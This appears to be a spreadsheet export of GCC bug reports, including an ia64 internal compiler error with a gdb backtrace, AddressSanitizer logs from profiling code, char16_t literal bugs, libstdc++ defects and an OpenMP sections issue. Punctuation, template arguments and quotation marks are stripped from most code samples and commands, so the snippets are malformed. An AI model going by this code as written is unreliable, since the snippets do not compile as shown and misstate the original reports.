vshuf-main.inc:28:1: internal compiler error: in expand_vec_perm_shrp at config/ia64/ia64.c:11107
Please submit a full bug report
[...]
Breakpoint 2 internal_error (gmsgid=0xd8d205 in %s at %s:%d) at ../../gcc-svn/trunk/gcc/diagnostic.c:839
839     {
(gdb) bt
#0  internal_error (gmsgid=0xd8d205 in %s at %s:%d) at ../../gcc-svn/trunk/gcc/diagnostic.c:839
#1  0x0000000000bd4f64 in fancy_abort (file= line=11107 function=0xce6410 expand_vec_perm_shrp)
    at ../../gcc-svn/trunk/gcc/diagnostic.c:899
#2  0x0000000000a71885 in expand_vec_perm_shrp (d=0x7fffffffd100) at ../../gcc-svn/trunk/gcc/config/ia64/ia64.c:11107
#3  expand_vec_perm_1 (d=0x7fffffffd100) at ../../gcc-svn/trunk/gcc/config/ia64/ia64.c:11164
#4  0x0000000000a718bd in ia64_expand_vec_perm_const_1 (d=0x7fffffffd100) at ../../gcc-svn/trunk/gcc/config/ia64/ia64.c:11390
#5  0x0000000000a7af58 in ia64_expand_vec_perm_const (operands=) at ../../gcc-svn/trunk/gcc/config/ia64/ia64.c:11467
#6  0x0000000000a9af44 in gen_vec_perm_constv2si (operand0=0x7ffff11ff320 operand1=0x7ffff11ff0e0 operand2=0x7ffff11ff340 
    operand3=0x7ffff1546d80) at ../../gcc-svn/trunk/gcc/config/ia64/vect.md:1601
#7  0x00000000007a1119 in maybe_expand_insn (icode= nops= ops=)
    at ../../gcc-svn/trunk/gcc/optabs.c:8301
#8  0x00000000007a15fa in expand_vec_perm_1 (icode=CODE_FOR_vec_perm_constv2si target= v0=0x7ffff11ff0e0 v1=0x7ffff11fa9c0 
    sel=) at ../../gcc-svn/trunk/gcc/optabs.c:6874
#9  0x00000000007a8052 in expand_vec_perm (mode=V2SImode v0=0x7ffff11ff0e0 v1=0x7ffff11fa9c0 sel=0x7ffff1546d80 target=0x7ffff11fa978)
    at ../../gcc-svn/trunk/gcc/optabs.c:6915
(gdb) frame 2
#2  0x0000000000a71885 in expand_vec_perm_shrp (d=0x7fffffffd100) at ../../gcc-svn/trunk/gcc/config/ia64/ia64.c:11107
11107     gcc_assert (IN_RANGE (shift 1 63))
(gdb) p shift
$1 = 96
(gdb) p d-&gt;perm[0]
$2 = 3 '\003'
(gdb) p debug_rtx (d-&gt;op0)
(reg:V2SI 340 [ a.22 ])
$3 = void
(gdb) p debug_rtx (d-&gt;op1)
(reg:V2SI 358)
$4 = void
Probably some adjustment to shift is missing when selecting second operand.</t>
  </si>
  <si>
    <t>GCC-3463</t>
  </si>
  <si>
    <t>A problem with long long ints</t>
  </si>
  <si>
    <t xml:space="preserve">	When trying to add 1 to an unsigned long long int I get 0 instead of a large number
Release:
3.0
Environment:
System: Linux barbecued.dcs.ed.ac.uk 2.2.16_public-3.dcs.9 #1 Wed Jan 24 07:30:43 GMT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --prefix=/useful/risky/wims/
How-To-Repeat:
	unsigned long long int sum
	sum = 0xffffffff + 0x01
	printf(%llusum)
	result should be 4294967296 but comes out as 0</t>
  </si>
  <si>
    <t>wims</t>
  </si>
  <si>
    <t>GCC-13833</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] Conversion problem in template function</t>
  </si>
  <si>
    <t>In this code 
--------------------- 
struct X { 
    template  
    X  
    X  
} 
X x 
template  void foo () { 
  x &lt;&lt; (1 ? ok : failed) 
} 
template void foo() 
------------------------ 
we now get 
g/x&gt; /home/bangerth/bin/gcc-3.5-pre/bin/c++ -c x.cc 
x.cc: In function `void foo()': 
x.cc:10: error: conditional expression between distinct pointer types `const 
char (*)[3]' and `const char (*)[7]' lacks a cast 
That sounds bogus to me though I could be wrong. This is with present 
mainline and tree-ssa (don't have 3.4 checked out right now but that 
is likely to be affected as well). 3.3 is ok though. 
Note that the same doesn't happen if foo is not a template which makes 
me even more suspicious. 
W.</t>
  </si>
  <si>
    <t>GCC-55417</t>
  </si>
  <si>
    <t>[4.8 Regression] AddressSanitizer reports stack-buffer-overflow in profiling code</t>
  </si>
  <si>
    <t>% g++ -fprofile-generate -O3 -march=native tramp3d-v4.cpp
 % ./a.out --cartvis 1.0 0.0 --rhomin 1e-8 -n 20
...
(gcc built with gcc's address-sanitizer)
 % /var/tmp/gcc_sani_gcc/usr/local/bin/g++ -w -fprofile-use -O3 -march=native tramp3d-v4.cpp 2&gt;&amp;1 | asan_symbolize.py | c++filt
=================================================================
==12985== ERROR: AddressSanitizer stack-buffer-overflow on address 0x7ffff9616080 at pc 0x12c1613 bp 0x7ffff9615b60 sp 0x7ffff9615b58
READ of size 8 at 0x7ffff9616080 thread T0
    #0 0x12c1612 in compute_working_sets /home/markus/gcc/gcc/profile.c:294
Address 0x7ffff9616080 is located at offset 1184 in frame  of T0's stack:
  This frame has 2 object(s):
    [32 112) 'hist_br_prob'
    [160 1184) 'working_set_cum_values'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism
      (longjmp and C++ exceptions *are* supported)
Shadow byte and word:
  0x1fffff2c2c10: f3
  0x1fffff2c2c10: f3 f3 f3 f3 00 00 00 00
More shadow bytes:
  0x1fffff2c2bf0: 00 00 00 00 00 00 00 00
  0x1fffff2c2bf8: 00 00 00 00 00 00 00 00
  0x1fffff2c2c00: 00 00 00 00 00 00 00 00
  0x1fffff2c2c08: 00 00 00 00 00 00 00 00
=&gt;0x1fffff2c2c10: f3 f3 f3 f3 00 00 00 00
  0x1fffff2c2c18: 00 00 00 00 00 00 00 00
  0x1fffff2c2c20: 00 00 00 00 00 00 00 00
  0x1fffff2c2c28: 00 00 00 00 00 00 00 00
  0x1fffff2c2c30: 00 00 00 00 00 00 00 00
Stats: 6791M malloced (6303M for red zones) by 9376941 calls
Stats: 56M realloced by 304143 calls
Stats: 6701M freed by 9250298 calls
Stats: 6668M really freed by 9204559 calls
Stats: 323M (82726 full pages) mmaped in 620 calls
  mmaps   by size class: 7:139230 8:26611 9:7161 10:2044 11:3060 12:16256 13:19264 14:576 15:1184 16:96 17:16 18:6 19:3 20:3 21:4 22:1
  mallocs by size class: 7:5705562 8:1531884 9:365712 10:67535 11:73243 12:1213506 13:240088 14:40078 15:139014 16:242 17:39 18:18 19:7 20:5 21:7 22:1
  frees   by size class: 7:5603422 8:1521617 9:365436 10:67516 11:73162 12:1212827 13:226955 14:40078 15:139010 16:204 17:39 18:16 19:7 20:5 21:4
  rfrees  by size class: 7:5575038 8:1513474 9:363702 10:67156 11:72856 12:1208081 13:225869 14:39895 15:138214 16:204 17:39 18:16 19:7 20:5 21:3
Stats: malloc large: 139333 small slow: 278410
==12985== ABORTING
(gcc built with clang's address-sanitizer)
 % /var/tmp/gcc_sani_clang/usr/local/bin/g++ -w -fprofile-use -O3 -march=native tramp3d-v4.cpp 2&gt;&amp;1 | asan_symbolize.py | c++filt
=================================================================
==13020== ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff6d236680 at pc 0x1393105 bp 0x7fff6d236090 sp 0x7fff6d236088
READ of size 8 at 0x7fff6d236680 thread T0
    #0 0x1393104 in get_exec_counts(unsigned int unsigned int) /home/markus/gcc/gcc/profile.c:294
    #1 0x16de490 in tree_profiling() /home/markus/gcc/gcc/tree-profile.c:483
Address 0x7fff6d236680 is located at offset 1312 in frame  of T0's stack:
  This frame has 15 object(s):
    [32 60) 'n_histogram_counters.i'
    [96 152) 'histogram_counts.i'
    [192 248) 'act_count.i'
    [288 1312) 'working_set_cum_values.i.i.i'
    [1344 1424) 'hist_br_prob.i'
    [1472 1504) ''
    [1536 1568) ''
    [1600 1608) 'values'
    [1664 1696) ''
    [1728 1760) ''
    [1792 1824) ''
    [1856 1888) ''
    [1920 1924) 'offset8'
    [1984 2016) 'curr_location'
    [2048 2080) 'curr_location9'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism
      (longjmp and C++ exceptions *are* supported)
Shadow byte and word:
  0x1fffeda46cd0: f2
  0x1fffeda46cd0: f2 f2 f2 f2 00 00 00 00
More shadow bytes:
  0x1fffeda46cb0: 00 00 00 00 00 00 00 00
  0x1fffeda46cb8: 00 00 00 00 00 00 00 00
  0x1fffeda46cc0: 00 00 00 00 00 00 00 00
  0x1fffeda46cc8: 00 00 00 00 00 00 00 00
=&gt;0x1fffeda46cd0: f2 f2 f2 f2 00 00 00 00
  0x1fffeda46cd8: 00 00 00 00 00 00 f4 f4
  0x1fffeda46ce0: f2 f2 f2 f2 00 00 00 00
  0x1fffeda46ce8: f2 f2 f2 f2 00 00 00 00
  0x1fffeda46cf0: f2 f2 f2 f2 00 f4 f4 f4
Stats: 6791M malloced (6302M for red zones) by 9367325 calls
Stats: 56M realloced by 303356 calls
Stats: 6701M freed by 9242907 calls
Stats: 6668M really freed by 9197073 calls
Stats: 322M (82470 full pages) mmaped in 618 calls
  mmaps   by size class: 7:135135 8:24564 9:7161 10:2044 11:3060 12:16256 13:19264 14:576 15:1184 16:96 17:16 18:6 19:3 20:3 21:4 22:1
  mallocs by size class: 7:5696469 8:1531371 9:365711 10:67535 11:73244 12:1213506 13:240081 14:40076 15:139014 16:241 17:39 18:18 19:7 20:5 21:7 22:1
  frees   by size class: 7:5594161 8:1523495 9:365437 10:67516 11:73162 12:1212827 13:226948 14:40076 15:139010 16:204 17:39 18:16 19:7 20:5 21:4
  rfrees  by size class: 7:5565685 8:1515347 9:363703 10:67156 11:72856 12:1208083 13:225862 14:39893 15:138214 16:204 17:39 18:16 19:7 20:5 21:3
Stats: malloc large: 139332 small slow: 278368
==13020== ABORTING</t>
  </si>
  <si>
    <t>GCC-15560</t>
  </si>
  <si>
    <t>SimpleTimeZone doesn't handle on-or-before/after at ends of month</t>
  </si>
  <si>
    <t>If you define a rule that goes beyond the ends of the month getOffset will give
incorrect results.  For example
timezone.setEndRule(Calendar.SEPTEMBER -6 -Calendar.TUESDAY 43200000)
refers to the tuesday on or before September 6.  In 2004 this is actually
August 31.
off = tz.getOffset(GregorianCalendar.AD 2004 Calendar.AUGUST 31
Calendar.TUESDAY 45000000)
should occur after the end rule but will return before it.
See mauve test gnu.testlet.java.util.SimpleTimeZone.check12 for this example.</t>
  </si>
  <si>
    <t>jlquinn</t>
  </si>
  <si>
    <t>GCC-60397</t>
  </si>
  <si>
    <t>The value of char16_t u'\uffff' is 0xdfff instead of 0xffff</t>
  </si>
  <si>
    <t>Created attachment 32247
uffff.c++ -- program that shows the problem
+++ This bug was initially created as a clone of Bug #59873 +++
I found another major bug with char16_t literals when trying to encode a U+FFFF.
1) A incorrect warning is emitted.
2) The value is incorrectly changed from U+FFFF to U+DFFF (a low surrogate).
This is very similar to but different that bug #59873. Because this problem seems related I've shown both the U+FFFF and U+0000 problem in the provided example code that triggers the bug. Notice that they fail in similar but different ways.
(For reference to those who care about other compilers none of these problems appear using clang 3.5.)
The following demonstrates the problem with both g++ 4.8.2 (released) and g++ 4.9.0 (trunk):
# First with g++ 4.8.2
$ g++ --version
g++ (Debian 4.8.2-14) 4.8.2
Copyright (C) 2013 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ g++ -std=c++11 uffff.c++
uffff.c++:3:16: warning: character constant too long for its type [enabled by default]
  static_assert(u'\uffff'        == 0xffff FAILS)
                ^
uffff.c++:7:16: warning: character constant too long for its type [enabled by default]
  static_assert(u'\U0000ffff'    == 0xffff FAILS)
                ^
uffff.c++:19:16: warning: character constant too long for its type [enabled by default]
  static_assert(u'\uffff'        != 0xdfff FAILS)
                ^
uffff.c++:21:16: warning: character constant too long for its type [enabled by default]
  static_assert(u'\U0000ffff'    != 0xdfff FAILS)
                ^
uffff.c++: In function â€˜int main()â€™:
uffff.c++:3:2: error: static assertion failed: FAILS
  static_assert(u'\uffff'        == 0xffff FAILS)
  ^
uffff.c++:7:2: error: static assertion failed: FAILS
  static_assert(u'\U0000ffff'    == 0xffff FAILS)
  ^
uffff.c++:11:2: error: static assertion failed: FAILS
  static_assert(u\uffff[0]     == 0xffff FAILS)
  ^
uffff.c++:15:2: error: static assertion failed: FAILS
  static_assert(u\U0000ffff[0] == 0xffff FAILS)
  ^
uffff.c++:19:2: error: static assertion failed: FAILS
  static_assert(u'\uffff'        != 0xdfff FAILS)
  ^
uffff.c++:21:2: error: static assertion failed: FAILS
  static_assert(u'\U0000ffff'    != 0xdfff FAILS)
  ^
uffff.c++:28:2: error: static assertion failed: FAILS
  static_assert(u'\u0000'        == 0x0000 FAILS)
  ^
uffff.c++:30:2: error: static assertion failed: FAILS
  static_assert(U'\u0000'        == 0x0000 FAILS)
  ^
uffff.c++:32:2: error: static assertion failed: FAILS
  static_assert(u'\U00000000'    == 0x0000 FAILS)
  ^
uffff.c++:34:2: error: static assertion failed: FAILS
  static_assert(U'\U00000000'    == 0x0000 FAILS)
  ^
uffff.c++:36:2: error: static assertion failed: FAILS
  static_assert(u\u0000[0]     == 0x0000 FAILS)
  ^
uffff.c++:38:2: error: static assertion failed: FAILS
  static_assert(U\u0000[0]     == 0x0000 FAILS)
  ^
uffff.c++:40:2: error: static assertion failed: FAILS
  static_assert(u\U00000000[0] == 0x0000 FAILS)
  ^
uffff.c++:42:2: error: static assertion failed: FAILS
  static_assert(U\U00000000[0] == 0x0000 FAILS)
  ^
uffff.c++:45:2: error: static assertion failed: FAILS
  static_assert(u'\u0000'        != 0x0001 FAILS)
  ^
uffff.c++:46:2: error: static assertion failed: FAILS
  static_assert(U'\u0000'        != 0x0001 FAILS)
  ^
uffff.c++:47:2: error: static assertion failed: FAILS
  static_assert(u'\U00000000'    != 0x0001 FAILS)
  ^
uffff.c++:48:2: error: static assertion failed: FAILS
  static_assert(U'\U00000000'    != 0x0001 FAILS)
  ^
uffff.c++:49:2: error: static assertion failed: FAILS
  static_assert(u\u0000[0]     != 0x0001 FAILS)
  ^
uffff.c++:50:2: error: static assertion failed: FAILS
  static_assert(U\u0000[0]     != 0x0001 FAILS)
  ^
uffff.c++:51:2: error: static assertion failed: FAILS
  static_assert(u\U00000000[0] != 0x0001 FAILS)
  ^
uffff.c++:52:2: error: static assertion failed: FAILS
  static_assert(U\U00000000[0] != 0x0001 FAILS)
  ^
# Change to g++ 4.9.0
$ g++ --version
g++ (Debian 4.9-20140218-1) 4.9.0 20140218 (experimental) [trunk revision 207856]
Copyright (C) 2014 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ g++ -std=c++11 uffff.c++ 2&gt;&amp;1
uffff.c++:3:16: warning: character constant too long for its type
  static_assert(u'\uffff'        == 0xffff FAILS)
                ^
uffff.c++:7:16: warning: character constant too long for its type
  static_assert(u'\U0000ffff'    == 0xffff FAILS)
                ^
uffff.c++:19:16: warning: character constant too long for its type
  static_assert(u'\uffff'        != 0xdfff FAILS)
                ^
uffff.c++:21:16: warning: character constant too long for its type
  static_assert(u'\U0000ffff'    != 0xdfff FAILS)
                ^
uffff.c++: In function â€˜int main()â€™:
uffff.c++:3:2: error: static assertion failed: FAILS
  static_assert(u'\uffff'        == 0xffff FAILS)
  ^
uffff.c++:7:2: error: static assertion failed: FAILS
  static_assert(u'\U0000ffff'    == 0xffff FAILS)
  ^
uffff.c++:11:2: error: static assertion failed: FAILS
  static_assert(u\uffff[0]     == 0xffff FAILS)
  ^
uffff.c++:15:2: error: static assertion failed: FAILS
  static_assert(u\U0000ffff[0] == 0xffff FAILS)
  ^
uffff.c++:19:2: error: static assertion failed: FAILS
  static_assert(u'\uffff'        != 0xdfff FAILS)
  ^
uffff.c++:21:2: error: static assertion failed: FAILS
  static_assert(u'\U0000ffff'    != 0xdfff FAILS)
  ^
uffff.c++:28:2: error: static assertion failed: FAILS
  static_assert(u'\u0000'        == 0x0000 FAILS)
  ^
uffff.c++:30:2: error: static assertion failed: FAILS
  static_assert(U'\u0000'        == 0x0000 FAILS)
  ^
uffff.c++:32:2: error: static assertion failed: FAILS
  static_assert(u'\U00000000'    == 0x0000 FAILS)
  ^
uffff.c++:34:2: error: static assertion failed: FAILS
  static_assert(U'\U00000000'    == 0x0000 FAILS)
  ^
uffff.c++:36:2: error: static assertion failed: FAILS
  static_assert(u\u0000[0]     == 0x0000 FAILS)
  ^
uffff.c++:38:2: error: static assertion failed: FAILS
  static_assert(U\u0000[0]     == 0x0000 FAILS)
  ^
uffff.c++:40:2: error: static assertion failed: FAILS
  static_assert(u\U00000000[0] == 0x0000 FAILS)
  ^
uffff.c++:42:2: error: static assertion failed: FAILS
  static_assert(U\U00000000[0] == 0x0000 FAILS)
  ^
uffff.c++:45:2: error: static assertion failed: FAILS
  static_assert(u'\u0000'        != 0x0001 FAILS)
  ^
uffff.c++:46:2: error: static assertion failed: FAILS
  static_assert(U'\u0000'        != 0x0001 FAILS)
  ^
uffff.c++:47:2: error: static assertion failed: FAILS
  static_assert(u'\U00000000'    != 0x0001 FAILS)
  ^
uffff.c++:48:2: error: static assertion failed: FAILS
  static_assert(U'\U00000000'    != 0x0001 FAILS)
  ^
uffff.c++:49:2: error: static assertion failed: FAILS
  static_assert(u\u0000[0]     != 0x0001 FAILS)
  ^
uffff.c++:50:2: error: static assertion failed: FAILS
  static_assert(U\u0000[0]     != 0x0001 FAILS)
  ^
uffff.c++:51:2: error: static assertion failed: FAILS
  static_assert(u\U00000000[0] != 0x0001 FAILS)
  ^
uffff.c++:52:2: error: static assertion failed: FAILS
  static_assert(U\U00000000[0] != 0x0001 FAILS)
  ^</t>
  </si>
  <si>
    <t>wjl</t>
  </si>
  <si>
    <t>GCC-78134</t>
  </si>
  <si>
    <t>set::set lower_bound() for transparent comparator returns const_iterator</t>
  </si>
  <si>
    <t>#include 
struct comp {
    bool operator()(int i int j) const {
        return i &lt; j
    }
    using is_transparent = void
}
template  struct is_same { static constexpr bool value = false  }
template  struct is_same { static constexpr bool value = true }
int main() {
    using S = std::set
    S s
    static_assert(is_same::value !)
}
We're invoking the function template version of lower_bound() but s is non-const so the result should be iterator. Instead we're getting const_iterator. This compiles on clang with libc++.</t>
  </si>
  <si>
    <t>barry.revzin</t>
  </si>
  <si>
    <t>GCC-28950</t>
  </si>
  <si>
    <t>regex wrong for testing on darwin in gcc/testsuite/gcc.target/powerpc/ppc-and-1.c</t>
  </si>
  <si>
    <t>I am able to verify that the regex for gcc/testsuite/gcc.target/powerpc/ppc-and-1.c is 
incorrect as previously diagnosed on the gcc mailing list...
http://gcc.gnu.org/ml/gcc/2006-09/msg00030.html
...and that the following change fixes the problem...
--- gcc-4.2-20060901/gcc/testsuite/gcc.target/powerpc/ppc-and-1.c       2006-08-13 14:10:07.000000000 -0400
+++ gcc-4.2-20060901.allocate/gcc/testsuite/gcc.target/powerpc/ppc-and-1.c      2006-09-01 20:10:44.000000000 -0400
@@ -18 +18 @@
 /* { dg-do compile { target { powerpc*-*-* &amp;&amp; lp64 } } } */
 /* { dg-options -O2 } */
-/* { dg-final { scan-assembler rlwinm \[0-9\]+\[0-9\]+0030  } } */
-/* { dg-final { scan-assembler rlwinm \[0-9\]+\[0-9\]+02930  } } */
+/* { dg-final { scan-assembler rlwinm r\[0-9\]+r\[0-9\]+0030  } } */
+/* { dg-final { scan-assembler rlwinm r\[0-9\]+r\[0-9\]+02930  } } */
 /* { dg-final { scan-assembler-not rldicr } } */
 /* Origin:Pete Steinmetz  */
...with this change this test properly passes at -m64 on Darwin...
Executing on host: /sw/src/fink.build/gcc4-4.1.999-20060902/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc4-4.1.999-20060902/darwin_objdir/gcc/ /sw/src/fink.build/
gcc4-4.1.999-20060902/gcc-4.2-20060902/gcc/testsuite/gcc.target/powerpc/ppc-and-1.c   -O2 -fno-show-column -S  -m64 -o ppc-and-1.s    (timeout = 300)
PASS: gcc.target/powerpc/ppc-and-1.c (test for excess errors)
PASS: gcc.target/powerpc/ppc-and-1.c scan-assembler rlwinm r[0-9]+r[0-9]+0030
PASS: gcc.target/powerpc/ppc-and-1.c scan-assembler rlwinm r[0-9]+r[0-9]+02930
PASS: gcc.target/powerpc/ppc-and-1.c scan-assembler-not rldicr</t>
  </si>
  <si>
    <t>GCC-21586</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/tree-ssa/ltrans-5.c scan-tree-dump-times transformed loop 1</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gcc-4.1/objdir/gcc/xgcc -B/home/dave/gcc-4.1/objdi
r/gcc/ /home/dave/gcc-4.1/gcc/gcc/testsuite/gcc.dg/tree-ssa/ltrans-5.c   -O2 -ft
ree-loop-linear -fdump-tree-ltrans-all -fno-show-column -S  -o ltrans-5.s    (ti
meout = 300)
PASS: gcc.dg/tree-ssa/ltrans-5.c (test for excess errors)
FAIL: gcc.dg/tree-ssa/ltrans-5.c scan-tree-dump-times Linear expression:  consta
nt: 1   invariants:   denominator: 1 1
FAIL: gcc.dg/tree-ssa/ltrans-5.c scan-tree-dump-times transformed loop 1</t>
  </si>
  <si>
    <t>GCC-43451</t>
  </si>
  <si>
    <t>[C++0x] atomic integral methods missing volatile overloads</t>
  </si>
  <si>
    <t>Since the resolution of LWG 1147 most of the methods on the atomic integral types should have two overloads a volatile and a non-volatile version.  However it appears that since r155377 the volatile overloads are missing from the atomic integral types altogether.</t>
  </si>
  <si>
    <t>veloso</t>
  </si>
  <si>
    <t>GCC-53631</t>
  </si>
  <si>
    <t>[C++11]  is unimplemented</t>
  </si>
  <si>
    <t>This is a placeholder bug for the missing  functionality.
It's documented as missing in
http://gcc.gnu.org/onlinedocs/libstdc++/manual/status.html#status.iso.2011
The whole of Clause 28 is partially supported or not supported at all.
Until someone works on it there is really no point reporting bugs against individual features.</t>
  </si>
  <si>
    <t>GCC-35969</t>
  </si>
  <si>
    <t>GLIBCXX_DEBUG: list::merge triggers bad assert</t>
  </si>
  <si>
    <t>The attached preprocessed source when compiled with -D_GLIBCXX_DEBUG encounters a runtime assert at the final call to splice.  According to http://www.sgi.com/tech/stl/List.html all iterators remain valid after a merge operation.  I believe that libstdc++ is not updating the _M_sequence members of the safe iterators merged into list1.
I've also attached unpreprocessed source with comments indicating the problem.
To reproduce the problem:
% g++ -D_GLIBCXX_DEBUG list.ii
% ./a.out
/usr/include/c++/4.2/debug/list:350:error: attempt to splice an iterator
    from a different container.
Objects involved in the operation:
iterator __i @ 0x0xbfd5ea30 {
type = N11__gnu_debug14_Safe_iteratorINSt6__norm14_List_iteratorIiEENSt7__debug4listIiSaIiEEEEE (mutable iterator)
  state = dereferenceable
  references sequence with type `NSt7__debug4listIiSaIiEEE' @ 0x0xbfd5ea30
}
sequence __x @ 0x0xbfd5e9c4 {
  type = NSt7__debug4listIiSaIiEEE
}
Aborted</t>
  </si>
  <si>
    <t>greened</t>
  </si>
  <si>
    <t>GCC-32468</t>
  </si>
  <si>
    <t>number of threads in a parallel region depends on number of SECTIONs and MAX_THREADS</t>
  </si>
  <si>
    <t>Description:
This test case exhibits the problem that the presence of a SECTIONS directive
with only one SECTION inside of a PARALLEL region causes only one thread to be
created when omp_set_num_threads was previously called with 4 threads.  If
the directives internal to this PARALLEL region are commented out 4 threads
are created and the program produces expected output.  The compiler used
was GNU gfortran.  The test case works as expected when compiled with PGI.
&gt; gfortran -v
Using built-in specs.
Target: x86_64-suse-linux
Configured with: ../xt-gcc-4.2.0/configure --prefix=/opt/gcc/4.2.0/snos --disable-nls --libdir=/opt/gcc/4.2.0/snos/lib --enable-languages=cc++fortran --with-gxx-include-dir=/opt/gcc/4.2.0/snos/include/g++ --with-slibdir=/opt/gcc/4.2.0/snos/lib --with-system-zlib --enable-shared --enable-__cxa_atexit x86_64-suse-linux
Thread model: posix
gcc version 4.2.0 20070514 (rpm:4)
&gt; cat bug2831.f90
! Derived from OpenMP test omp1/F2_1_1_2_1c.f90
      use omp_lib
      implicit none
      integer parameter :: NT = 4
      integer :: nth
!$    call omp_set_dynamic(.false.)
!$    call omp_set_num_threads(NT)
!$omp parallel default(none) shared(nth)
      print * omp_get_thread_num() omp_get_num_threads()
!$omp sections
!$omp section
      nth=omp_get_num_threads()
!$omp endsections
!$omp endparallel
      print * 'nth='nth'  NT='NT
      END
&gt; diff bug2831.f90 bug2831a.f90
1112d10
&lt; !$omp sections
&lt; !$omp section
14d11
&lt; !$omp endsections
Incorrect output is produced:
&gt; ftn -O0 -fopenmp -o x bug2831.f90
/opt/xt-pe/2.1/bin/snos64/ftn: INFO: linux target is being used
&gt; aprun -n 1 ./x
           0           1
 nth=           1   NT=           4
Application 217361 resources: utime 0 stime 0
Correct output from program with sections/section directives removed:
&gt; ftn -O0 -fopenmp -o xa bug2831a.f90
/opt/xt-pe/2.1/bin/snos64/ftn: INFO: linux target is being used
&gt; aprun -n 1 ./xa
           0           4
           1           4
           3           4
           2           4
 nth=           4   NT=           4
Application 217362 resources: utime 0 stime 0
------
Note: ftn is an alias for:
/opt/gcc/4.2.0/bin/../snos/bin/gfortran -static -v -I/opt/xt-mpt/2.1/mpich2-64/GP/include -I/opt/xt-mpt/2.1/mpich2-64/GP/include -L/opt/xt-mpt/2.1/mpich2-64/GP/lib -I/opt/acml/3.6.1/gnu64/include -I/opt/xt-libsci/10.1.0/gnu/snos64/include -I/opt/xt-libsci/10.1.0/gnu/snos64/include/superlu -I/opt/xt-mpt/2.1/sma/P/include -L/opt/acml/3.6.1/gnu64/lib -L/opt/xt-libsci/10.1.0/gnu/snos64/lib -L/opt/xt-mpt/2.1/sma/P/lib -lmpichf90 -lsci -lacml -lsma -lmpichf90 -lmpich -lrt -D__CRAYXT_COMPUTE_LINUX_TARGET -D__TARGET_LINUX__ -fno-second-underscore -I/notbackedup/users/rsrel/rs64.DEV.070604.Mon/install/include -I/opt/xt-catamount/2.1/catamount/linux/include -I/opt/xt-service/2.1/include -L/notbackedup/users/rsrel/rs64.DEV.070604.Mon/install/lib/snos64 -L/opt/xt-pe/2.1/cnos/linux/64/lib -L/opt/xt-mpt/2.1/lib/snos64 -L/opt/xt-service/2.1/lib/snos64 -Wl--start -lpct -lalpslli -lalpsutil -lportals -lpthread -Wl--end -lgfortranbegin -lgfortran -lm</t>
  </si>
  <si>
    <t>GCC-2501</t>
  </si>
  <si>
    <t>GCC segfaults on certain errors</t>
  </si>
  <si>
    <t>gcc: save-temps: No such file or directory
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc: unrecognized option `-02'
gcc version 2.96 20000731 (Red Hat Linux 7.0)
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c++ -D__GNUG__=2 -v -D__GNUC__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Wall -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ prod_list.cpp /tmp/ccb3v3ef.ii
GNU CPP version 2.96 20000731 (Red Hat Linux 7.0) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-3 (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus /tmp/ccb3v3ef.ii -quiet -dumpbase prod_list.cpp -Wall -version -o /tmp/cc5LG2mA.s
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0) (i386-redhat-linux) compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.0).
prod_list.cpp:35: no `void ProductionList::GetProduction ()' member
function declared in class `ProductionList'
prod_list.cpp:35: declaration of `void ProductionList::GetProduction
()' outside of class is not definition
prod_list.cpp:36: parse error before `{'
prod_list.cpp:39: syntax error before `!='
prod_list.cpp:39: syntax error before `++'
prod_list.cpp:44: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
Red Hat Linux 7.0 on a AMD K6-2 no special settings for GCC or anything related
How-To-Repeat:
just a good old compile of the sources there is ofcourse errors in my code but thats what causes the GCC fault it seems.</t>
  </si>
  <si>
    <t>jholla14</t>
  </si>
  <si>
    <t>GCC-44412</t>
  </si>
  <si>
    <t>[4.6 Regression] Another bogus set-but-not-used warning</t>
  </si>
  <si>
    <t>This one causes tons of warnings in the libstdc++ testsuite (with -Wall in CXXFLAGS) and seems also bogus to me.
struct ratio
{
  static const int a = 3
}
const int ratio::a
int f()
{
  ratio r
  return r.a
}</t>
  </si>
  <si>
    <t>GCC-30927</t>
  </si>
  <si>
    <t>tree-nested creates pointless static chains and trampolines when the callgraph is non-trivial</t>
  </si>
  <si>
    <t>If a nested subroutine calls another nested subroutine that follows it lexically then convert_all_function_calls will force the called function to take a static chain even though it may not need one.  The most trivial example of this is a recursive nested subroutine as in example n1.c:
void n1(void) { void a(void) { a() } }
$ gcc -c n1.c -fdump-tree-nested
$ grep chain n1.c.*nested
  a () [static-chain: CHAIN.1]
A pointless static chain has been created.
Here's an example n2.c in which the caller and callee disagree about whether a static chain is needed or not: the caller thinks it is needed the callee does not.
void n2(void) {
  auto void a(void)
  void b(void) { a() }
  void a(void) {}
}
This might seem fairly harmless but can become expensive when trampolines are needlessly created.  Example n3.c:
void n3(void) {
  auto void a(void *)
  void b(void) { a(b) }
  void a(void *f) {}
}
$ gcc -c n3.c -fdump-tree-nested
